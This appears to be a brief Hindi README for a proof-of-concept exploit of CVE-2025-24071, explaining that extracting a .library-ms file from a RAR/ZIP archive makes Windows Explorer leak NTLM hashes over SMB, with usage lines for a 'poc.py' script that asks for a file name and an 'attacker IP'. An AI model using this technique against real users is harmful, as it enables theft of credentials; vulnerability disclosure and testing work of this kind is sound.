
CVE-2025-24071: RAR/ZIP निष्कर्षण और .library-ms फ़ाइल के माध्यम से NTLM हैश लीक
CVE-2025-24071: RAR/ZIP निष्कर्षण और .library-ms फ़ाइल के माध्यम से NTLM हैश लीक
Windows Explorer स्वचालित रूप से SMB प्रमाणीकरण अनुरोध शुरू करता है जब .rar आर्काइव से .library-ms फ़ाइल निकाली जाती है, जिससे NTLM हैश का खुलासा होता है। उपयोगकर्ता को फ़ाइल खोलने या निष्पादित करने की आवश्यकता नहीं है—केवल निकालना ही लीक को ट्रिगर करने के लिए पर्याप्त है।
https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
>>python poc.py
>>enter file name: your file name
>>enter IP: attacker IP
https://github.com/user-attachments/assets/fa6f16da-70ce-45e5-ac55-0c92a3623cad
